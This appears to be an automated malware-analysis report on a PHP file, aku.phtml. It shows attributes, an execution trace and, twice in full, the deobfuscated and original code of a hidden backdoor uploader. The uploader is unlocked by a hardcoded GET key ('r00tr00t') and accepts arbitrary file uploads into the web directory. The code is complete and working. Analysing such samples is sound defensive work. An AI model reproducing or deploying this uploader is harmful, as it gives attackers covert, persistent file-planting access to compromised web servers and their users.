PHP Malware Analysis
aku.phtml
md5: 2793c8da555f3d5a3414d97d728a6d26
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- #~ Uploader Hidden ~# (Deobfuscated, Original)
URLs
- http://www.w3.org/1999/xhtml (Deobfuscated, Original)
Deobfuscated PHP code
<?php
$FilesMan = "r00tr00t";
if ($_GET['POST'] == $FilesMan) {
/*
Fixed Bug #1
*/
if (isset($_POST['uploaded'])) {
$file = $_FILES['files']['name'];
$files = $_FILES['files']['tmp_name'];
$folder = "";
if (move_uploaded_file($files, $folder . $file)) {
$result = "Uploaded :<a href='{$file}' Men='_blank'>=> Click Ur File ^_^</A>";
} else {
$result = "Fail Try...";
}
}
echo "\n<!DOCTYPE html>\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n<title>#~ Uploader Hidden ~#</title>\n</head>";
echo '
<head>
<style>
body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
h1,h3 { color:white; font-family:Verdana; font-size:11px; }
input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
textarea { font-family:Courier; }
a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
a:hover { color:rgb(0, 250, 0); }
td { font-size:12px; vertical-align:middle; }
th { font-size:13px; vertical-align:middle; }
table { empty-cells:show; }
.inf { color:#7F7F7F; }
</style>
</head>
<body>
<center>
<h3>{ Uploader Hidden }</h3>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="files" />
<input type="submit" name="uploaded" value="Upload">
</form>
' . $result . '
</body>
</html>';
}Execution traces
data/traces/2793c8da555f3d5a3414d97d728a6d26_trace-1676256567.128.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:49:53.025872]
1 0 1 0.000149 393512
1 3 0 0.000217 397272 {main} 1 /var/www/html/uploads/aku.phtml 0 0
1 A /var/www/html/uploads/aku.phtml 2 $FilesMan = 'r00tr00t'
1 3 1 0.000266 397272
0.000292 314304
TRACE END [2023-02-13 00:49:53.026044]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
$FilesMan ="r00tr00t";
if($_GET['POST']==$FilesMan){
/*
Fixed Bug #1
*/
if(isset($_POST['uploaded']))
{
$file = $_FILES['files']['name'];
$files= $_FILES['files']['tmp_name'];
$folder="";
if(move_uploaded_file($files,$folder.$file))
{
$result = "Uploaded :<a href='$file' Men='_blank'>=> Click Ur File ^_^</A>";
}
else
{
$result = "Fail Try...";
}
}
echo'
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>#~ Uploader Hidden ~#</title>
</head>';
echo'
<head>
<style>
body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
h1,h3 { color:white; font-family:Verdana; font-size:11px; }
input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
textarea { font-family:Courier; }
a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
a:hover { color:rgb(0, 250, 0); }
td { font-size:12px; vertical-align:middle; }
th { font-size:13px; vertical-align:middle; }
table { empty-cells:show; }
.inf { color:#7F7F7F; }
</style>
</head>
<body>
<center>
<h3>{ Uploader Hidden }</h3>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="files" />
<input type="submit" name="uploaded" value="Upload">
</form>
'.$result.'
</body>
</html>';
}
?>